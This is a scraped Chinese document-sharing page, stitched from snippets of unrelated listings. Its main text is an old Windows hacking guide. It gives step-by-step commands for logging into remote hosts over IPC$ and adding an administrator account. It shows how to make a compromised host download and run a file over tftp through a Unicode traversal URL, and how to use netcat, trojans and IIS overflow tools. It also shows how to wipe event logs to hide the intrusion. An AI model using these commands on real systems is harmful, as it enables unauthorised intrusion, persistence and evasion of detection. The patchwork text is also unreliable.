网管和黑客都必须知道的命令

合集下载

八个常用的网络命令ping、Telnet等详细方法介绍

八个常用的网络命令ping、Telnet等详细方法介绍

八个常用的网络命令ping、Telnet等详细方法介绍一,ping它是用来检查网络是否通畅或者网络连接速度的命令。

它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。

在 DOS 窗口中键入:ping /?回车。

所示如下帮助画面:ping/?-t 表示将不间断向目标 IP 发送数据包,直到我们强迫其停止。

-l 定义发送数据包的大小,默认为32 字节,我们利用它可以最大定义到65500 字节。

可以结合上面介绍的-t 参数一起使用,验证网络的承载能力。

ping/l-n 定义目标IP发送数据包的次数,默认为4次。

如果网络速度比较慢,4次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧,如图所示:ping-nping 命令不一定非得ping IP,也可以ping主机域名,这样就可以得到主机的IP,比如,小编ping百度,如图所示:ping主机域名其实直接输入百度的IP也可以上网,不用通过DNS域名解析了,这样访问百度会更快。

二、nbtstat该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。

在此我们就有必要了解几个基本的参数。

-a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息(下同)。

-A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。

-n 列出本地机器的NETBIOS信息。

当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了。

nbtstat命令行三、netstat这是一个用来查看网络状态的命令,操作简便功能强大。

黑客常用命令大全

黑客常用命令大全

Dos常用命令一:net use \\ip\ipc$ " " /user:" " 建立IPC空链接net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: \\ip\c$ 登陆后映射对方C:到本地为H:net use \\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务;(如:net start telnet,net start schedule)net stop 服务名停止某服务net time \\目标ip 查看对方时间net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view \\ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C:共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况,常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

番外篇二黑客攻击常用命令

番外篇二黑客攻击常用命令

无参数:当在 界面中, 无参数:当在DOS界面中,键入不带参数的 界面中 命令后按“ “net user”命令后按“Enter”键将查看电 命令后按 键将查看电 脑上的用户账号列表。 脑上的用户账号列表。 username:在输入“net user”命令后,再 命令后, :在输入“ 命令后 输入具体的用户账号名称, 输入具体的用户账号名称,如 “administrator”,可查看该用户账号的相 , 关信息。其中用户账号名最多可以有20个字 关信息。其中用户账号名最多可以有 个字 符。
-l length:发送包含由 :发送包含由length指定数据量的 指定数据量的 ECHO数据包。默认为“32 字节”,最大 数据包。 数据包 默认为“ 字节” 值是“ 字节” 值是“65500字节”。 字节 -f:在数据包中发送“不要分段”标志 数据 :在数据包中发送“不要分段”标志,数据 包就不会被路由上的网关分段。 包就不会被路由上的网关分段。通常所发送 的数据包都会通过路由分段再发送给对方, 的数据包都会通过路由分段再发送给对方, 加上此参数以后路由就不会再分段处理。 加上此参数以后路由就不会再分段处理。 -i ttl:将“生存时间”字段设置为 指定的 生存时间”字段设置为ttl指定的 : 指定ttl值在对方的系统里停留的时间 值在对方的系统里停留的时间, 值。指定 值在对方的系统里停留的时间, 同时检查网络运转情况。 同时检查网络运转情况。
net use是连接电脑或断开电脑与共享资源 是连接电脑或断开电脑与共享资源 的连接,或显示电脑连接信息命令。 的连接,或显示电脑连接信息命令。 net use命令的格式:net use <驱动器盘符 命令的格式: 命令的格式 驱动器盘符 地址\sharename。 〉:\\IP地址 地址 。 输入不带参数的“ 命令, 输入不带参数的“net use”命令,即可显示 命令 当前网络的连接状况。 当前网络的连接状况。

史上最全cmd命令大全黑客必备

史上最全cmd命令大全黑客必备

cmd常用命令大全 cmd运行命令cmd常用命令大全2K和XP下的CMD命令accwiz.exe > 辅助工具向导acsetups.exe > acs setup dcom server executable actmovie.exe > 直接显示安装工具append.exe > 允许程序打开制定目录中的数据arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表at.exe > 计划运行任务atmadm.exe > 调用管理器统计attrib.exe > 显示和更改文件和文件夹属性autochk.exe > 检测修复文件系统autoconv.exe > 在启动过程中自动转化系统autofmt.exe > 在启动过程中格式化进程autolfn.exe > 使用长文件名格式bootok.exe > boot acceptance application for registry bootvrfy.exe > 通报启动成功cacls.exe > 显示和编辑aclcalc.exe > 计算器cdplayer.exe > cd播放器change.exe > 与终端服务器相关的查询charmap.exe > 字符映射表chglogon.exe > 启动或停用会话记录chgport.exe > 改变端口(终端服务)chgusr.exe > 改变用户(终端服务)chkdsk.exe > 磁盘检测程序chkntfs.exe > 磁盘检测程序cidaemon.exe > 组成ci文档服务cipher.exe > 在ntfs上显示或改变加密的文件或目录cisvc.exe > 索引容ckcnv.exe > 变换cookiecleanmgr.exe > 磁盘清理cliconfg.exe > sql客户网络工具clipbrd.exe > 剪贴簿查看器clipsrv.exe > 运行clipboard服务clspack.exe > 建立系统文件列表清单cluster.exe > 显示域的集群_cmd_.exe > 没什么好说的!cmdl32.exe > 自动下载连接管理cmmgr32.exe > 连接管理器cmmon32.exe > 连接管理器监视cmstp.exe > 连接管理器配置文件安装程序comclust.exe > 集群comp.exe > 比较两个文件和文件集的容*compact.exe > 显示或改变ntfs分区上文件的压缩状态conime.exe > ime控制台control.exe > 控制面板convert.exe > 转换文件系统到ntfsconvlog.exe > 转换iis日志文件格式到ncsa格式cprofile.exe > 转换显示模式cscript.exe > 较本宿主版本csrss.exe > 客户服务器runtime进程csvde.exe > 日至格式转换程序dbgtrace.exe > 和terminal server相关dcomcnfg.exe > dcom配置属性dcphelp.exe > ?dcpromo.exe > ad安装向导ddeshare.exe > dde共享ddmprxy.exe >debug.exe > 就是debug啦!dfrgfat.exe > fat分区磁盘碎片整理程序dfrgntfs.exe > ntfs分区磁盘碎片整理程序dfs_cmd_.exe > 配置一个dfs树dfsinit.exe > 分布式文件系统初始化dfssvc.exe > 分布式文件系统服务器diantz.exe > 制作cab文件diskperf.exe > 磁盘性能计数器dllhost.exe > 所有com+应用软件的主进程dllhst3g.exe >dmadmin.exe > 磁盘管理服务dmremote.exe > 磁盘管理服务的一部分dns.exe > dns applications dnsdoskey.exe > 命令行创建宏dosx.exe > dos扩展dplaysvr.exe > 直接运行帮助drwatson.exe > 华生医生错误检测drwtsn32.exe > 华生医生显示和配置管理dtcsetup.exe > installs mdtcdvdplay.exe > dvd播放dxdiag.exe > direct-x诊断工具 edlin.exe > 命令行的文本编辑器(历史悠久啊!)edlin.exe > 命令行的文本编辑器(历史悠久啊!)esentutl.exe > ms数据库工具eudcedit.exe > type造字程序eventvwr.exe > 事件查看器evnt_cmd_.exe > event to trap translator; configuration toolevntwin.exe > event to trap translator setupexe2bin.exe > 转换exe文件到二进制expand.exe > 解压缩extrac32.exe > 解cab工具fastopen.exe > 快速访问在存中的硬盘文件faxcover.exe > 传真封面编辑faxqueue.exe > 显示传真队列faxsend.exe > 发送传真向导faxsvc.exe > 启动传真服务fc.exe > 比较两个文件的不同find.exe > 查找文件中的文本行findstr.exe > 查找文件中的行finger.exe > 一个用户并显示出统计结果fixmapi.exe > 修复mapi文件flattemp.exe > 允许或者禁用临时文件目录fontview.exe > 显示字体文件中的字体forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行freecell.exe > popular windows game 空当接龙ftp.exe > file transfer protocol used to transfer files over a networ k connection 就是ftp了gdi.exe > graphic device interface 图形界面驱动grovel.exe >grpconv.exe > program manager group convertor 转换程序管理员组help.exe > displays help for windows 2000 commands 显示帮助hostname.exe > display hostname for machine. 显示机器的hostnameie4uinit.exe > ie5 user install tool ie5用户安装工具ieshwiz.exe > customize folder wizard 自定义文件夹向导iexpress.exe > create and setup packages for install 穿件安装包iisreset.exe > restart iis admin service 重启iis服务internat.exe > keyboard language indicator applet 键盘语言指示器ipconfig.exe > windows 2000 ip configuration. 察看ip配置ipsecmon.exe > ip security monitor ip安全监视器ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序irftp.exe > setup ftp for wireless communication 无线连接ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务jdbgmgr.exe > microsoft debugger for java 4 java4的调试器jetconv.exe > convert a jet engine database 转换jet engine数据库jetpack.exe > compact jet database. 压缩jet数据库jview.exe > command-line loader for java java的命令行装载者krnl386.exe > core component for windows 2000 2000的核心组件label.exe > change label for drives 改变驱动器的卷标lcwiz.exe > license compliance wizard for local or remote systems. 许可证符合向导ldifde.exe > ldif cmd line manager ldif目录交换命令行管理licmgr.exe > terminal server license manager 终端服务许可协议管理lights.exe > display connection status lights 显示连接状况llsmgr.exe > windows 2000 license manager 2000许可协议管理llssrv.exe > start the license server 启动许可协议服务器lnkstub.exe >locator.exe > rpc locator 远程定位lodctr.exe > load perfmon counters 调用性能计数logoff.exe > log current user off. 注销用户lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态,显示被送到基于unix的服务器的打印任务lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印机。

黑客最基本要掌握的英语

黑客最基本要掌握的英语

microsoft antivirus 微软反病毒软件microsoft corporation 微软公司mini 小的modem setup 调制解调器安装module name 模块名monitor mode 监控状态Monochrome monitors 单色监视器move to 移至multi 多new data 新建数据newer 更新的new file 新文件new name 新名称new window 新建窗口norton nortonnostack 栈未定义Note: careless use deltree 注意:小心使用deltreeonline help 联机求助optionally 可选择地or 或page frame 页面page length 页长Every screen displayed information about suspended after 在显示每屏信息后暂停一下pctools pc工具postscript 附言prefix meaning not 前缀意即\"不prefix to rever seorder 反向显示的前缀Prefixes used on a short horizontal line and - after the switch (for example /-w) preset switch用前缀和放在短横线-后的开关(例如/-w)预置开关press a key toresume 按一键继续press any key for file functions 敲任意键执行文件功能press enter to keep the same date 敲回车以保持相同的日期press enter to keep thes ame time 敲回车以保持相同的时间press esc tocontinue 敲esc继续press esc to exit 敲<esc>键退出press esc to exit fdisk 敲esc退出fdiskpress esc to return to fdisk options 敲esc返回fdisk选项previously 在以前print all 全部打印print device 打印设备print erport 打印机端口processesfilesinalldirectoriesinthespecifiedpath 在指定的路径下处理所有目录下的文件program file 程序文件program ming environment 程序设计环境Each goal in the creation of documents remind you 在创建每个目标文件时提醒你promptsy outo press a key before copying 在拷贝前提示你敲一下键pull down 下拉pull downmenus 下拉式选单quick FORMat 快速格式化quick view 快速查看read only file 只读文件read only file attribute 只读文件属性read only files 只读文件read only mode 只读方式redial 重拨repeat last find 重复上次查找report bfile 报表文件resize 调整大小respectively 分别地rightmargin 右边距rootdirectory 根目录Running debug, it is a testing and editing tools 运行debug, 它是一个测试和编辑工具run time error 运行时出错save all 全部保存saveas 另存为scan disk 磁盘扫描程序screen colors 屏幕色彩screen options 屏幕任选项screen saver 屏幕暂存器screen savers 屏幕保护程序screen size 屏幕大小scroll bars 翻卷栏scroll lock off 滚屏已锁定search for 搜索sector spertrack 每道扇区数selectgroup 选定组selectionbar 选择栏setactivepartition 设置活动分区setupoptions 安装选项shortcutkeys 快捷键showclipboard 显示剪贴板singleside 单面size move 大小/移动sort help S排序H帮助sortorder 顺序Special services: D directory maintenance特殊服务功能: D目录维护List of designated to drive, directory, and documents 指定要列出的驱动器,目录,和文件Designated you want to parent directory as the current directory 指定你想把父目录作为当前目录The new document specified directory or file name指定新文件的目录或文件名Copies of the document to designated 指定要拷贝的文件stack over flow 栈溢出stand alone 独立的startu poptions 启动选项statu sline 状态行stepover 单步summaryof 摘要信息Cancellation confirmed suggest that you would like to cover 取消确认提示,在你想覆盖一个swapfile 交换文件Switches can be installed in the environment variable dircmd开关可在dircmd环境变量中设置switch to 切换到sync 同步system file 系统文件system files 系统文件system info 系统信息system in FORM ation 系统信息程序table of contents 目录terminal emulation 终端仿真terminal settings 终端设置test file 测试文件test file para meters 测试文件参数the active window 激活窗口Switches can copycmd preset environment variables开关可以在copycmd环境变量中预置the two floppy disks must be the same type 两个软磁盘必须是同种类型的this may be over ridden with y on the commandline 在命令行输入/-y可以使之无效toggle reakpoint 切换断点toms dos 转到MS-DOStopm argin 页面顶栏turn off 关闭Type cd drives: designated driver that the current directory 键入cd驱动器:显示指定驱动器的当前目录Type cd without parameters of the current drive to show the current directory键入无参数的cd以显示当前驱动器的当前目录The date and type of parameters that the current date set键入无参数的date,显示当前日期设置unmark 取消标记unse lect 取消选择uses bare FORMat 使用简洁方式uses lower case 使用小写uses widelist FORMat 使用宽行显示using help 使用帮助verbosely 冗长地verifies that new file sare writ tencorrectly 校验新文件是否正确写入了video mode 显示方式view window 内容浏览viruses 病毒vision 景象vollabel 卷标volumelabel 卷标volume serial number is 卷序号是windows help windows 帮助wordwrap 整字换行working directory 正在工作的目录worm 蠕虫write mode 写方式write to 写到xmsmemory 扩充内存you may 你可以我把网络安全方面的专业词汇整理了一下,虽然大多是乱谈,但初衷在于初学者能更好的了解这些词汇。

学黑客需要学的知识点

学黑客需要学的知识点

学黑客需要学的知识点黑客一词源于英文hacker,最初被用于形容计算机领域具有卓越技能的人。

但随着时间的推移,黑客的定义变得更加复杂,涵盖了更广泛的领域。

学习黑客需要掌握一系列技能和知识点,下面将逐步介绍。

1.基础计算机知识黑客需要对计算机的基本原理和操作有深入的了解。

这包括计算机硬件、操作系统、网络协议等。

掌握这些知识将帮助你更好地理解计算机系统的工作原理,为后续的学习和实践奠定基础。

2.编程语言学习编程语言是成为一名优秀黑客的关键。

掌握一门或多门编程语言,如Python、C++、Java等,将使你能够编写自己的软件程序,并更好地理解其他人编写的代码。

编程能力是黑客攻击和防御中的重要一环。

3.网络安全知识网络安全是黑客学习的核心内容。

学习网络安全知识将使你能够理解不同类型的攻击和防御技术。

了解常见的网络漏洞、攻击技术和防御机制,如SQL注入、跨站脚本、DDoS攻击等,将有助于你成为一名有竞争力的黑客。

4.操作系统安全了解不同操作系统的安全机制和弱点是学习黑客的关键一步。

掌握Linux系统的命令行操作和常用工具,了解Windows系统的漏洞和防御措施,将使你能够更好地利用系统漏洞或加强系统安全。

5.数据库知识数据库是现代应用中常见的数据存储方式。

了解数据库的原理、结构和安全性将有助于你在黑客攻击和数据泄露方面有更多的了解和技巧。

学习SQL语言和一些主流数据库系统,如MySQL、Oracle等,将使你能够更好地操作和保护数据。

6.密码学密码学是黑客学习中的重要领域。

了解对称加密和非对称加密的原理、常见的加密算法和破解方法,将使你能够更好地理解密码学的基本概念和应用,为密码破解和保护提供基础。

7.社会工程学社会工程学是黑客攻击中的重要手段。

学习社会工程学将使你能够更好地了解人类心理和行为,并利用这些知识进行社交工程攻击。

这包括欺骗、钓鱼等手段,通过社交工程获取目标的敏感信息。

8.漏洞研究和利用学习漏洞研究和利用将使你能够发现和利用软件和系统中的漏洞。

CMD下的黑客WiFi操控命令 – 即刻安全

CMD下的黑客WiFi操控命令 – 即刻安全

在日常中我们使用 windows 查看或连接无线,我们只需点开 internet 访问,即可轻松查看和选择我们所要连接的无线网络。

但在某些特定场景下,我们只能使用 cmd 窗口进行操作时,那么我们又该如何进行 wifi 的正常查看及连接呢?下面,我将教大家一些操控 wifi 的实用命令。

打开我们 windows 下的 cmd 终端窗口,输入如下命令查看周围可用 wifi : netsh wlan show networksmode=bssid20161113082441如果想要进行无线网络的连接,我们需要使用到配置文件。

输入以下命令查看配置文件:netsh wlan show profiles20161113084230指定所需配置文件及 ssid 后,进行连接。

命令如下:netsh wlan connect ssid=XXXXX name=XXXXX20161113084043断开连接:netsh wlan disconnect20161113084628将配置文件以 XML 格式导出并保存在本地:20161113084908按服务集标识符 (SSID) 向无线允许或阻止列表中添加无线网络:注:如果 permission 为 allow 或 block,则 ssid 参数是必需的。

如果permission 为 denyall,则不指定 ssid 参数。

过滤列表中指定无线网络:netsh wlan add filter permission=block ssid=XXXXX networktype=infrastructure20161113085328过滤列表中所有无线网络:netsh wlan add filter permission=denyall network=infrastructure20161113090620将被阻止的网络设为显示:netsh wlan set blockednetworks display=show20161113093224显示已安装的网卡驱动属性:netsh wlan show drivers20161113091152转载请注明:即刻安全 » CMD下的黑客WiFi操控命令。

黑客基础入门之初级安全命令介绍(一)

黑客基础入门之初级安全命令介绍(一)

黑客最早源自英文hacker,早期在美国的电脑界是带有褒义的,但在媒体媒体报道中,黑客一词往往指那些软件骇客(software cracker)。

但是随着互联网的不断发展,以及网络安全的不断加固,一些人开始视黑客为一项业余的嗜好,而这些人不做恶意破坏,只追求共享黑客最早源自英文hacker,早期在美国的电脑界是带有褒义的,但在媒体媒体报道中,黑客一词往往指那些“软件骇客”(software cracker)。

但是随着互联网的不断发展,以及网络安全的不断加固,一些人开始视“黑客”为一项业余的嗜好,而这些人不做恶意破坏,只追求共享、免费,他们的出现推动了计算机和网络的发展与完善。

那么对于一些初级爱好者来说,黑客基础入门知识便显得尤为重要,今日小编就为大家带来了黑客基础入门之初级安全命令介绍,以便初学者能够更好的追求自己的业余嗜好。

在M$的操作系统中,与网络安全较有关系的几个命令/程序是:ping\winipcfg\tracert\net\at\netstat。

因此,小编将一一为大家介绍:1. ping:这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS][-r count] [-s count] [[-j host-list] [-k host-list]][-w timeout] destination-listOptions:-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)-a Resolve addresses to hostnames.(把IP转为主机名)-n count Number of echo requests to send.(响应请求的数量)-l size Send buffer size.(封包的大小)-f Set Don't Fragment flag in packet.(信息包中无碎片)-i TTL Time To Live.(时间)-v TOS Type Of Service.(服务类型)-r count Record route for count hops.-s count Timestamp for count hops.-j host-list Loose source route along host-list.-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)比如大家可能都知道的一个命令# ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

网管和黑客都必须知道的命令 常用的几条NET命令: ================================================== (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ (查看远程主机时间) net time \\IP地址 (定时启动某个程序) at \\IP地址 02:18 readme.exe (查看共享) net view \\IP地址 (查看netbios工作组列表) nbtstat -A IP地址 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" (这两条把自己增加到管理员组): net user 用户名 密码 /add net localgroup Administrators 用户名 /add (断开连接) net use \\IP地址\ipc$ /delete ===================================================== 擦屁屁: del C:\winnt\system32\logfiles\*.* del C:\winnt\system32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log ============================ 一、netsvc.exe 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: netsvc /list \\IP地址 netsvc schedule \\IP地址 /query netsvc \\IP地址 schedule /start 二、OpenTelnet.exe 远程启动主机的Telnet服务,并绑定端口到7878,例如: OpenTelnet \\IP地址 用户名 密码 1 7878 然后就可以telnet到主机的7878端口,进入DOS方式下: telnet IP地址 7878 三、winshell.exe 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:

p Path (查看winshell主程序的路径信息) b reBoot (重新启动机器) d shutDown (关闭机器) s Shell (执行后你就会看到可爱的“C:\>”) x eXit (退出本次登录会话,此命令并不终止winshell的运行) CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 四、3389登陆器,GUI方式登录远程主机的 五、elsave.exe 事件日志清除工具 elsave -s \\IP地址 -l "application" -C elsave -s \\IP地址 -l "system" -C elsave -s \\IP地址 -l "security" -C 执行后成功清除应用程序日志,系统日志,安全日志 六、hbulot.exe 开启win2kserver和winxp的3389服务 hbulot [/r] 使用/r表示安装完成后自动重起目标使设置生效。 七、nc.exe(netcat.exe) 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 想要连接到某处: nc [-options] hostname port[s] [ports] ... 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -u UDP模式 -v 详细输出——用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉——用于扫描时 八、TFTPD32.EXE 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名

然后可以直接令文件运行: http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后 winxp下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

一、一 Xscan命令行运行参数说明: 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。

1.命令格式: xscan -host [-] [其他选项] xscan -file [其他选项] 其中 含义如下: -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);

-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); [其他选项] 含义如下: -v: 显示详细扫描进度 -p: 跳过Ping不通的主机 -o: 跳过没有检测到开放端口的主机 -t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10 常见病毒、木马进程速查表 exe → BF Evolution Mbbmanager.exe → 聪明基因 _.exe → Tryit Mdm.exe → Doly 1.6-1.7 Aboutagirl.exe → 初恋情人 Microsoft.exe → 传奇密码使者 Absr.exe → Backdoor.Autoupder Mmc.exe → 尼姆达病毒 Aplica32.exe → 将死者病毒 Mprdll.exe → Bla Avconsol.exe → 将死者病毒 Msabel32.exe → Cain and Abel Avp.exe → 将死者病毒 Msblast.exe → 冲击波病毒 Avp32.exe → 将死者病毒 Mschv.exe → Control Avpcc.exe → 将死者病毒 Msgsrv36.exe → Coma Avpm.exe → 将死者病毒 Msgsvc.exe → 火凤凰 Avserve.exe → 震荡波病毒 Msgsvr16.exe → Acid Shiver Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5 Cfiaudit.exe → 将死者病毒 Netip.exe → Spirit 2000 Beta Cfinet32.exe → 将死者病毒 Netspy.exe → 网络精灵 Checkdll.exe → 网络公牛 Notpa.exe → Backdoor Cmctl32.exe → Back Construction Odbc.exe → Telecommando Command.exe → AOL Trojan Pcfwallicon.exe → 将死者病毒 Diagcfg.exe → 广外女生 Pcx.exe → Xplorer Dkbdll.exe → Der Spaeher Pw32.exe → 将死者病毒 Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap Dvldr32.exe → 口令病毒 Regscan.exe → 波特后门变种 Esafe.exe → 将死者病毒 Tftp.exe → 尼姆达病毒 Expiorer.exe → Acid Battery Thing.exe → Thing Feweb.exe → 将死者病毒 User.exe → Schwindler Flcss.exe → Funlove病毒 Vp32.exe → 将死者病毒 Frw.exe → 将死者病毒 Vpcc.exe → 将死者病毒 Icload95.exe → 将死者病毒 Vpm.exe → 将死者病毒 Icloadnt.exe → 将死者病毒 Vsecomr.exe → 将死者病毒 Icmon.exe → 将死者病毒 Server.exe → Revenger, WinCrash, YAT Icsupp95.exe → 将死者病毒 Service.exe → Trinoo Iexplore.exe → 恶邮差病毒 Setup.exe → 密码病毒或Xanadu Rpcsrv.exe → 恶邮差病毒 Sockets.exe → Vampire Rundll.exe → SCKISS爱情森林 Something.exe → BladeRunner Rundll32.exe→ 狩猎者病毒 Spfw.exe → 瑞波变种PX Runouce.exe → 中国黑客病毒 Svchost.exe (线程105) → 蓝色代码 Scanrew.exe → 传奇终结者 Sysedit32.exe → SCKISS爱情森林 Scvhost.exe → 安哥病毒 Sy***plor.exe → wCrat Server 1. 2.exe → Spirit 2000 1.2fixed Sy***plr.exe → 冰河 Intel.exe → 传奇叛逆 Syshelp.exe → 恶邮差病毒 Internet.exe → 传奇幽灵 Sysprot.exe → Satans Back Door Internet.exe → 网络神偷 Sysrunt.exe → Ripper

相关文档
最新文档